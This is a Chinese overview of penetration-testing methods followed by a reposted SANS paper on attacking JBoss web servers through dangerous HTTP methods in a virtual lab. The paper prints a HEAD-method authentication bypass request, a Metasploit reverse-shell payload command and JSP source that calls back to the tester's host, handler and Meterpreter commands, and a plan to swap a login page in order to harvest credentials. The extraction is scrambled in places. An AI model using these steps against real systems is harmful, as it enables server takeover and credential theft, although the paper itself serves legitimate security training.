渗透测试方法

渗透测试 (penetration test)并没有一个标准的定义，国外一些安全组织达成共识的通用说法是：渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析，这个分析是从一个攻击者可能存在的位置来进行的，并且从这个位置有条件主动利用安全漏洞。

比喻某种事物或势力逐渐进入其他方面 封建观念的残余还，然后对网络系统渗透测试的方法进行了一个全方面的了解，黑客的攻击入侵是需要运用目标网络安全弱点，渗透测试也是同样的道理，他模拟黑客真正入侵的方法，以人工渗透为主。辅助以攻击工具使用，这样保证整个渗透测试过程都在可以控制和调整的范围内。

渗透测试常用的方法：

有1SQL注入漏洞、文件上传、目录遍历、XSS跨站攻击、弱口令漏洞、溢出漏洞、嗅探攻击、拒绝服务攻击、DNS劫持攻击、旁注攻击、诱导攻击等。让我对渗透有一个更新的了解，也明白了其中的道理。 我们认为渗透测试还具有的两个显著特点是：渗透测试是一个渐进的并且逐步深入的过程。渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。 渗透测试与其他评估方法的区别：通常评估方法是根据已知信息资产或其他被评估对象，去发现所有相关的安全问题。渗透测试是根据已知可利用的安全漏洞，去发现是否存在相应的信息资产，通常评估方法对评估结果更具有全面性，渗透测试则更注重安全漏洞的严重性。 有些渗透测试人员通过使用两套扫描器进行安全评估。这些工具至少能够使整个过程实现部分自动化，这样，技术娴熟的专业人员就可以专注于所发现的问题。如果探查得更深入，则需要连接到任何可疑服务，某些情况下，还要利用漏洞。

商用漏洞扫描工具在实际应用中存在一个重要的问题：如果它所做的测试未能获得肯定答案，许多产品往往会隐藏测试结果。譬如，有一款知名扫描器就存在这样的缺点：要是它无法进入Cisco路由器，或者无法用SNMP获得其软件版本号，它就不会做出这样的警告：该路由器容易受到某些拒绝服务（DoS）攻击。如果不知道扫描器隐藏了某些信息（譬如它无法对某种漏洞进行测试），你可能误以为网络是安全的，而实际上，网络的安全状况可能是危险的。

除了找到合适工具以及具备资质的组织进行渗透测试外，还应该准确确定测试范围。攻击者会借助社会工程学、偷窃、贿赂或者破门而入等手法，获得有关信息。真正的攻击者是不会仅仅满足于攻击某个企业网络的。通过该网络再攻击其它公司往往是黑客的惯用伎俩。攻击者甚至会通过这种方法进入企业的ISP。 由Pete Herzog提出的

Open Source Security Testing Methodology Manual (OSSTMM)已经成为执行渗透测试和获得安全基准的事实方法。根据Pete Herzog的观点，“OSSTMM的主要目标是实现透明度。它实现了对那些不具备充足安全配置和政策的人的透明度。它实现了对那些没有执行足够安全性和渗透测试的人的透明度。它实现了对那些已经很缺乏安全预算的牺牲者仍然尽力压榨其每一分预算的无良安全供应商的透明度；以及对那些回避商业价值而炒作法律规范、网络破坏和黑客等威胁的人的透明度。OSSTMM的渗透测试范畴包括从初始需求分析到生成报告的整个风险评估过程。”这个测试方法包含了六个方面：

?信息安全性

?过程安全性

?Internet技术安全性

?通信安全性

?无线安全性

?物理安全性

OSSTMM关注测试项的技术细节，在安全必测试之前、期间和之后需要做什么，以及如何界定结果。针对国际化最初实践方法、法律、规章和道德问题的新测试都会定期增加和更新。

National Institute of Standards and Technology (NIST)在

Special Publication 800-42, Guideline on Network Security Testing中讨论了渗透测试。NIST的方法虽然不及OSSTMM全面，但是它更可能被管理部门所接受。

另一个需要注意的方面是渗透测试服务提供商。每一个单位在渗透测试过程中最担心的一个问题是敏感信息可能通过错误的路径。因此，收集尽可能多关于公司的信息变得非常重要（如他们的技术能力、证书、经验、方法和所使用的工具），并且要保证他们是专业人员。此外，有一些专业的官方证书可以表明公司的可信赖程度及其与行业最佳实践的一致性。

第二篇：基于HTTP方法的Web应用渗透测试 42100字

Interested in learningmore about security?

SANS InstituteInfoSec Reading Room

This paper is from the SANS Institute Reading Room site. Reposting is not permitted without express written permission.Penetration Testing Of A Web Application UsingDangerous HTTP Methods

Vulnerability scanner results and web security guides often suggest that dangerous HTTP methods should bedisabled. But these guides usually do not describe in detail how to exploit these methods. In the penetrationtesting of a web application or web server, this type of vulnerability is easy to find, but it is not easy touse when it comes to performing penetration test against the web application. This paper will describe indetail why these HTTP methods are dangerous and how to use such a method for the penetration...

Copyright SANS Institute

Author Retains Full Rights

AD

PENETRATION TESTING OF A WEB APPLICATION

USING DANGEROUS HTTP METHODS

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A? 2012 SANS Institute, Author retains full rights.GIAC GWAPT Gold Certification Author: ?Issac ?Museong ?Kim, [email protected] ?Advisor: ?Dominicus ?Adriyanto ?Hindarto ? ? ?Accepted: ?30 ?April ?2012 ? ? ?Abstract ?Vulnerability ?scanner ?results ?and ?web ?security ?guides ?often ?suggest ?that ?dangerous ?HTTP ?methods ?should ?be ?disabled. ?But ?these ?guides ?usually ?do ?not ?describe ?in ?detail ?how ?to ?exploit ?these ?methods. ?In ?the ?penetration ?testing ?of ?a ?web ?application ?or ?web ?server, ?this ?type ?of ?vulnerability ?is ?easy ?to ?find, ?but ?it ?is ?not ?easy ?to ?use ?when ?it ?comes ?to ?performing ?penetration ?test ?against ?the ?web ?application. ?This ?paper ?will ?describe ?in ?detail ?why ?these ?HTTP ?methods ?are ?dangerous ?and ?how ?to ?use ?such ?a ?method ?for ?the ?penetration ?test. ?Finally, ?it ?will ?demonstrate ?how ?this ?method ?can ?be ?used ?during ?penetration ?testing. ? ?

Penetration testing of a web application using dangerous HTTP methods |

1. Introduction

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A? 2012 SANS Institute, Author retains full rights.PUT, DELETE, TRACE, and CONNECT, and this set can be extended. In this section, the dangerous. functions of the methods are described briefly with an explanation of why some of them are The OPTIONS method is used to request available methods on a server, while the GET method is used to retrieve the information that is requested. The GET method is one of the most common ways to retrieve web resources. The HEAD method is similar to the GET method, but entity enclosed in a body; the response to this request is determined by the server. The PUT method is used to store the enclosed entity on a server, while the DELETE method is used to remove the resources from the server. The TRACE method is employed to return the request Finally, the CONNECT method creates a tunnel with a proxy (Fielding et al., 1999). There are also extended HTTP methods such as web-based distribution authoring and versioning (WEBDAV). WEBDAV can be used by clients to publish web contents and involves a number (Goland, Whitehead, Faizi, Carter, & Jensen, 1999). of other HTTP methods such as PROPFIND, MOVE, COPY, LOCK, UNLOCK, and MKCOL HTTP methods can be used to help developers in the deployment and testing of web applications. On the other hand, when they are configured improperly, these methods can be used for malicious activity (Meucci, Keary, & Cuthbert, 2009). demonstration of their usage. This paper will explain such techniques further by providing a more detailed explanation and a Issac Museong Kim, [email protected] HTTP methods are functions that a web server provides to process a request. For example, the “GET” method is used to retrieve the web page from the server. According to RFC 2616, there are eight HTTP methods for HTTP 1.1, specifically OPTIONS, GET, HEAD, POST, is used to retrieve only header information. The POST method is used to send a request with the that was received by the final recipient from the client so that it can diagnose the communication.

Penetration testing of a web application using dangerous HTTP methods |

2. Dangerous Use of HTTP methods

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A? 2012 SANS Institute, Author retains full rights.are required for a common web server. But PUT, DELETE, and CONNECT methods are not required for the most of web servers. It is dangerous to have these methods enabled on a web methods are dangerous and provide an example of utilizing them to attack a web application. the web server has the PUT method available in the JBOSS server, it is possible to upload JSP shells that can be used to execute malicious commands to the server (Sutherland, 2011). Moreover, this method can be employed to launch a phishing attack. The attacker can upload an HTML page with hyperlinks that redirect a victim to the malicious website or a malicious login form that can collect user’s confidential information. Second, the DELETE method can be used to remove important files in the application, causing the denial of service or removal of access configuration files, such as “.htaccess” in an Apache server, to gain unauthorized access (SANS Institute, 2009). Third, the CONNECT method can be employed to tunnel peer to peer (P2P) traffic over HTTP traffic. Since the network traffic is tunneled, the attacker can hide the contents of the unauthorized traffic is difficult because it is often hidden in ways that make it almost indistinguishable from normal authorized traffic” (Alman, 2003). traffic, as well as being able to bypass firewalls or security devices. As a result, “detecting this Additionally, the HEAD method is not considered dangerous but it can be used to attack sent to the target URL to initiate the execution to bypass the authentication. The penetration such as HEED (Dabirsiaghi, 2008). More details on how these methods can be employed are given in the next section. Issac Museong Kim, [email protected] Most of the HTTP methods mentioned above can be utilized to attack a web application. While GET and POST are used in most attacks, the methods themselves are not the problem and application because this can significantly impact its security. This section will explain why these First, the PUT method can be used to introduce malicious codes and shells to the target. If a web application by mimicking the GET request. For example, the default security constraint of JAVA EE web.xml files restricts only the GET and POST methods, so the HEAD request can be tester can actually use different verbs such as TRACE, PUT, DELETE, and any arbitrary strings

Penetration testing of a web application using dangerous HTTP methods |

3. Penetration Testing Scenarios

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A? 2012 SANS Institute, Author retains full rights.to show how and when to use each method, we will cover all steps of a penetration test: Reconnaissance, mapping, discovery and exploitation. Furthermore, there are three phases of uses the HEAD method to attack a public web server. The second phase uses the PUT/DELETE method to attack an intranet server. Finally, the last phase uses the CONNECT method to attack a firewall. Since the purpose of this paper is to demonstrate the usage of dangerous HTTP methods, some general steps such as using NMAP scanning are not described extensively. We will discuss the use of dangerous HTTP methods during a penetration test. In order testing in the demonstration. Each phase follows the three steps mentioned above. The first phase 3.1 The Testing Lab Environment The lab resembles a company network that has two DMZ networks protected by a firewall. Figure 1 shows the network diagram of the company. This network was built with the VMWARE team feature, which creates a virtual LAN segment. All three LAN segments are connected by the virtual router/firewall, Vyatta 6.0. Since this is a virtual lab, a private IP address range has been used. A subnet 10.10.10.10/24 has been assigned to an external network and IP address 10.10.10.1 has been reserved for the firewall’s external interface. For this demonstration, IP address 10.10.10.10 is the DMZ 1 network and IP address 192.168.10.1 has been reserved for the firewall’s DMZ 1 interface; IP address 192.168.10.10 has been reserved for a public web server. reserved for the penetration tester’s laptop. Another subnet 192.168.10.0/24 has been assigned to A subnet 192.168.65.0/24 has been assigned to the DMZ 2 network, while IP address 192.168.65.1 has been reserved for the firewall’s DMZ 2 interface. Two servers, an intranet web server and a proxy server, are connected to the DMZ 2 network. IP address 192.168.65.10 has proxy server. been reserved for the intranet web server and IP address 192.168.65.10 has been reserved for the The firewall restricts access to these networks. A host in the DMZ 1 network is only accessible via TCP port 80 from both the outside and the inside. A host in the DMZ 1 network can access hosts in any other network through only TCP port 80 and 8080. Hosts in the DMZ 2 network are not accessible from the outside network, but the DMZ 1 network is allowed to access the proxy server via TCP port 80 and 8080. Issac Museong Kim, [email protected]

Penetration testing of a web application using dangerous HTTP methods |

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A? 2012 SANS Institute, Author retains full rights. Figure 1: Network diagram. by taking advantage of HTTP method which enables on public web server. 4. Compromising Public Web Server This section demonstrates how the penetration tester gains an access to public web server 4.1. Reconnaissance This penetration test is a black box test; the penetration tester does not have any knowledge about the target systems. At this point, the penetration tester only knows the company name and IP address ranges, which are subnet 10.10.10.0/24 and subnet 192.168.10.0/24. First, the penetration tester runs an NMAP scan against these two networks and finds the following information: ? 10.10.10.1: Network device with no ports open; open. ? 192.168.10.10: Windows XP running Tomcat 5.0/JBOSS 4.0 with TCP port 80 Since port 80 is listening on host 192.168.10.10, the penetration tester does a further check and finds out that HTTP methods are enabled on the host. There are several ways to check the enabled methods; the easiest way is by using a telnet command, as shown in Figure 2. The result shows that the host accepts many dangerous HTTP methods such as PUT and DELETE. Issac Museong Kim, [email protected]

Penetration testing of a web application using dangerous HTTP methods |

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A?2 SANS Inste, Author retai full rights.Figure 2: Telnet command to check the HTTP methods. called http-methods.nse, which can be obtained from http://nmap.org/nsedoc/scripts/http-methods. This script is useful when multiple targets or ports need to be checked (Stroessenreuther, 2009). It also provides more detailed and accurate output than using a telnet Figure 3. nmap --script=http-methods.nse --script-args http-methods.retest=1 192.168.10.0/24 Starting Nmap 5.51 ( http://nmap.org ) at 2012-01-03 15:04 Nmap scan report for 192.168.10.10 Host is up (0.000059s latency). Not shown: 979 closed ports PORT STATE SERVICE 80/tcp open http | http-methods: GET HEAD POST PUT DELETE TRACE OPTIONS | Potentially risky methods: PUT DELETE TRACE | See http://nmap.org/nsedoc/scripts/http-methods.html | GET / -> HTTP/1.1 200 OK | HEAD / -> HTTP/1.1 200 OK | POST / -> HTTP/1.1 200 OK | PUT / -> HTTP/1.1 403 Forbidden | DELETE / -> HTTP/1.1 403 Forbidden | TRACE / -> HTTP/1.1 403 TRACE method is not allowed |_OPTIONS / -> HTTP/1.1 200 OK MAC Address: 00:0C:29:0D:52:E6 (VMware) Nmap done: 1 IP address (1 host up) scanned in 15.78 seconds telnet 192.168.10.10 80 OPTIONS / HTTP/1.1 Host: 192.168.10.10 HTTP/1.1 200 OK X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS Content-Length: 0 Date: Tue, 03 Jan 2012 20:07:42 GMT Server: Apache-Coyote/1.1 Another method of checking which HTTP methods are enabled is using an NMAP script command because it actually tests the available methods to see if it they are allowed, as shown in Issac Museong Kim, [email protected]

Penetration testing of a web application using dangerous HTTP methods |

Figure 3: NMAP http-methods.nse check for the HTTP method.

Lastly, there is a Firefox plug-in called RESTClient that can be obtained from

? 2012 SANS Institute, Author retains full rights.RESTful/WebDav services using the GUI interface (Zhou, 2011). To use this plug-in, the

penetration tester selects the “OPTIONS” method and inserts the URL of the target web Response Header tab. application, then clicks the “Send” button. As shown in Figure 4, the result is displayed in the

Figure 4: RESTClient Firefox plug-in screenshot. https:///en-US/firefox/addon/restclient/. This plug-in allows testers to execute

4.2. Vulnerability Discovery

At this point, the penetration tester knows that TCP port 80 is listening on host

192.168.10.10, which runs JBOSS 4.0, as well as which HTTP methods are enabled on host 192.168.10.10. The penetration tester determines that the JBOSS interface is accessible on this server, as shown in Figure 5. Thus, the penetration tester researches JBOSS version 4.0 on the to the web server. Using this shell, the attacker may be able to take control of the web server. internet and finds out that it has a vulnerability that allows an unauthorized JSP shell deployment This vulnerability can be exploited by using the default console login, the HTTP verb tampering technique, or the HTTP PUT method (Sutherland, 2011).

Issac Museong Kim, [email protected]

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A

Penetration testing of a web application using dangerous HTTP methods |

Default console login allows the hacker to log into the JBOSS JMX console with the default login credential, while the HTTP verb tampering technique uses the HTTP HEAD

? 2012 SANS Institute, Author retains full rights.be provided in the discussion of the exploitation phase. The HTTP PUT method can be enabled

on the JBOSS framework, allowing a JSP shell to be uploaded.

Figure 5: JBOSS interface screenshot.

method to bypass the authentication of the JBOSS framework; a detailed explanation of this will

4.3. Exploitation

In this exploitation phase, the penetration tester tries to log into the JBOSS JMX console, but the console is password protected, as shown in Figure 5, and the default username and password do not work. Thus, the penetration tester decides to use the next method, which is an HTTP verb tampering technique (Dabirsiaghi, 2008). This technique utilizes the deployment URL with the HEAD method instead of the GET or POST method. The request can bypass authentication because the JBOSS framework only checks the GET and POST methods by default.

Issac Museong Kim, [email protected]

function of the JBOSS framework. The function can be executed by requesting an associated

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A

Penetration testing of a web application using dangerous HTTP methods |

To carry out HTTP verb tampering, the penetration tester first uploads the “browser.war” file to server 10.10.10.10, which is owned by the penetration tester. The browser.war file is a

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A? 2012 SANS Insteutr rins full rights.web archive file (WAF) that contains a JSP shell (Vonloesch, 2006). Once this WAR file is shell is available with the file name “browser.jsp.” Next, the penetration tester needs to determine which URL will be used to bypass the authentication. Thus, the penetration tester installs JBOSS 4.0.0 on the server and learns how to deploy a WAR file by intercepting the an HTTP request URL based on this information, as shown in Figure 7. Figure 6: Burp proxy requests interception in deploying the browser.war file. Figure 7: Deployment of the browser.war file. As a next step, the penetration tester sends the request using the HEAD method to the browses the http://192.168.10.10/browser/browser.jsp page; Figure 9 shows that the shell is deployed successfully. Issac Museong Kim, [email protected] deployed to the JBOSS framework, the JSP shell becomes available in the target web server. The request with the Burp Suite proxy tool, as shown in Figure 6. Then, the penetration tester creates GET /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.deployment%Atype%3DDeploymentScanner2Cflavor%3DURL&methodIndex=6&arg0=http%3A%2F2F10.10.10.10%2Fbrowser.war HTTP/1.1 http://192.168.10.10/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&methodIndex=6&arg0=http%3A%2F%2F10.10.10.10%2Fbrowser.war server 192.168.10.10, as shown in Figure 8, using Burp Suite’s repeater function. Then it obtains the HTTP 200 OK response, which means that the request was successful. The penetration tester

Penetration testing of a web application using dangerous HTTP methods |

? 2012 SANS Institute, Author retains full rights.

Figure 8: Deployment of the browser.war file using the HEAD method.

Figure 9: Access to the browser.jsp page.

Now, the penetration tester accesses the shell through the web browser. Using this shell, the penetration tester can create a file, delete a file, or browse the file systems in the web server. However, the penetration tester wants full access to the server in order to use this server as a pivot system to attack other systems. The penetration tester determines that the firewall blocks any incoming request to the web server other than TCP port 80, and therefore plans to set up a reverse shell. To do this, the penetration tester creates another JSP file that connects back to the Issac Museong Kim, [email protected]

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A

Penetration testing of a web application using dangerous HTTP methods |

penetration tester’s server, 10.10.10.10, via TCP port 80 with the Metasploit framework, as illustrated in Figure 10 (Sutherland, 2011). Figure 11 shows the contents of the “cmd.jsp” file

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A?2 SANS Institute, Author retas frigs.that is created. ruby c:\metasploit\msf3\msfpayload java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=80 R > cmd.jsp Figure 10: Creating the cmd.jsp file. 0 ) { out.write( buffer, 0, length ); out.flush(); } } catch( Exception e ){} try { if( in != null ) in.close(); if( out != null ) out.close(); } catch( Exception e ){} } } Issac Museong Kim, [email protected]

Penetration testing of a web application using dangerous HTTP methods |

{

Socket socket = new Socket( "10.10.10.10", 80 );

Process process = Runtime.getRuntime().exec( "cmd.exe" ); ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();

( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();

} catch( Exception e ) {}

%>

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A? 2012 SNS Instituteuthor retains fuights.Figure 11: Contents of the cmd.jsp file. In the next step, the penetration tester uploads the cmd.jsp page to the web server using the upload feature of the browser.jsp shell, and confirms that the cmd.jsp page is accessible from http://192.168.10.10/browser/cmd.jsp. The penetration tester then sets up the reverse shell 2011). listener on his or her own server, as shown in Figure 12, with a Metasploit console (Sutherland, msf > use exploit/multi/handler msf exploit(handler) > setg LHOST 10.10.10.10 LHOST => 10.10.10.10 msf exploit(handler) > setg LPORT 80 LPORT => 80 msf exploit(handler) > setg PAYLOAD java/jsp_shell_reverse_tcp PAYLOAD => java/jsp_shell_reverse_tcp msf exploit(handler) > setg SHELL cmd.exe SHELL => cmd.exe msf exploit(handler) > exploit j –z Figure 12: Setting up the reverse shell listener. After the penetration tester accesses the cmd.jsp page, which triggers the reverse shell connection from the web server, the Metasploit console shows that the session has been created, as illustrated in Figure 13. The penetration tester then upgrades the shell to a Meterpreter shell for more privileges and opens a VNC shell for GUI access to the server, as shown in Figure 14. The penetration tester also runs the “getuid” command from the Meterpreter shell and determines that system access has been achieved. The penetration tester now has system access to the server with both Meterpreter and VNC sessions open. Issac Museong Kim, [email protected]

Penetration testing of a web application using dangerous HTTP methods |

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A? 2012 SANS Instie, Author retains full h.Figure 13: Reverse shell connected. msf exploit(handler) > sessions -u 4 [*] Started reverse handler on 10.10.10.10:80 [*] Starting the payload handler... [*] Command Stager progress - 1.66% done (1699/102108 bytes) [*] Command Stager progress - 100.00% done (102108/102108 bytes) msf exploit([*] Sending stage (752128 bytes) to 10.10.10.1 handler) > [*] Meterpreter session 5 opened (10.10.10.10:80 -> 10.10.10.1:11915) at 2012-01-03 19:47:25 -0800 msf exploit(handler) > sessions -i 5 [*] Starting interaction with 5... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > run vnc.rb [*] Creating a VNC reverse tcp stager: LHOST=10.10.10.10 LPORT=8080) [*] Running payload handler [*] VNC stager executable 73802 bytes long [*] Uploaded the VNC agent to C:\DOCUME~1\iamissac\LOCALS~1\Temp\CIttLogWwI.exe (must be deleted manually) [*] Executing the VNC agent with endpoint 10.10.10.10:8080... [*] Starting the payload handler... [*] Command shell session 4 opened (10.10.10.10:80 -> 10.10.10.1:11914) [*] Session 4 created in the background. Figure 14: Upgrade to the Meterpreter and VNC shells. 5. Attacking Internal Server This section demonstrates how the penetration tester attacks internal server from public web server by taking advantage of HTTP method which enables on internal server. 5.1. Reconnaissance Once the penetration tester has system access to public web server, he downloads necessary tools such as NMAP and RESTClient, through the existing Meterpreter session for gathering more information, as shown in Figure 15. Then, he scans network 192.168.10.0/24 but he finds no other host. When he checks proxy setting on the public web server, he finds that the public web server uses a proxy server and IP address of the proxy server is 192.168.65.77. Issac Museong Kim, [email protected]

Penetration testing of a web application using dangerous HTTP methods |

[*] uploading : tools.zip à? c:\\windows\system32

[*] uploaded : tools.zip à? c:\\windows\system32\tools.zip

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A?2 SANS Institute, Authr retains full rights.Figure 15: Using the Meterpreter session to upload tools. 5.2. Vulnerability Discovery Based on the previous reconnaissance phase, the penetration tester decides to scan network 192.168.65.0/24 using NMAP and enable HTTP-method NSE script, as shown in Figure 16. NMAP shows that host 192.168.65.10 and host 192.168.65.77 are active and reachable. NMAP also shows that web service is running on host 192.168.65.0 and this server accepts dangerous HTTP methods. 192.168.65.0/24 Nmap scan report for 192.168.65.10 Not shown: 993 closed ports PORT STATE SERVICE 80/tcp open http | http-methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST | Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT | See http://nmap.org/nsedoc/scripts/http-methods.html | OPTIONS / -> HTTP/1.1 200 OK | TRACE / -> HTTP/1.1 501 Not Implemented | GET / -> HTTP/1.1 200 OK | HEAD / -> HTTP/1.1 200 OK | DELETE / -> HTTP/1.1 207 Multi-Status | COPY / -> HTTP/1.1 400 Bad Request | MOVE / -> HTTP/1.1 400 Bad Request | PROPFIND / -> HTTP/1.1 411 Length Required | PROPPATCH / -> HTTP/1.1 400 Bad Request | SEARCH / -> HTTP/1.1 411 Length Required | MKCOL / -> HTTP/1.1 405 Method Not Allowed | UNLOCK / -> HTTP/1.1 400 Bad Request | PUT / -> HTTP/1.1 411 Length Required |_POST / -> HTTP/1.1 405 Method Not Allowed Nmap scan report for 192.168.65.77 Host is up (0.0037s latency). Not shown: 991 closed ports PORT STATE SERVICE 8080/tcp open http-proxy |_http-methods: No Allow or Public header in OPTIONS responseNmap done: 256 IP addresses (2 hosts up) scanned in 52.94 seconds Figure 16: NMAP scan result of the 192.168.65.0/24 network. Issac Museong Kim, [email protected]

Penetration testing of a web application using dangerous HTTP methods |

The penetration tester finds out that host 192.168.65.10 is being used as company's intranet web server, as show in Figure 17. ? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A? 2012 SANS Institute, Author retains full rights. Figure 17: Screenshot of the HTTP Methods, Inc. intranet web server. The penetration tester also finds out that host 192.168.65.10 accepts PUT and DELETE methods. Instead of compromising the web server itself, the penetration tester decides to obtain with a modified one which enables the penetration tester to get a copy of the user credential. the user credential through a phishing attack. He has a plan to delete original page and replace it 5.3. Exploitation The penetration tester needs to take several steps in order to perform the phishing attack. First, the penetration tester needs to download the source of the original login page, index.htm, and finds out which parameters represent the username and password. Then, the penetration tester must modify the original login page so that it sends the login credential to the penetration to the “login.php” script in the web server, 192.168.65.10; however, in the modified code, the username and password are sent to the login.php script on the penetration tester’s web server, 10.10.10.10. Issac Museong Kim, [email protected] tester’s server. As shown in Figure 18, in the original code, a username and a password are sent

Penetration testing of a web application using dangerous HTTP methods |

Enter the username Enter the password

Modified Code: index.htm

Enter the username Enter the password

? 2012 The SANS InstituteKuthor retains full rights.ey fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46A?2 SS Institute, Author retains l rights.Figure 18: Modification of the index.htm file. The penetration tester subsequently creates a new login.php file on the penetration tester’s server, 10.10.10.10, which will store the login credentials received from the user, as index.htm file and names it index2.htm; this file will be used to process the normal login shown in Figure 19 (T0mmy, 2009). The penetration tester also creates a copy of the original procedure. For example, when a user opens the modified index.htm file, his username and password will be sent to the modified version of the login.php script on the penetration tester’s will redirect the user back to the index2.htm file. At this point, the user may feel weird because he is asked to login again. However, the user may think that he just fat-fingered the credential and try the login process again. This time the user will be able login successfully because index2.htm is being used instead of the modified index.html file.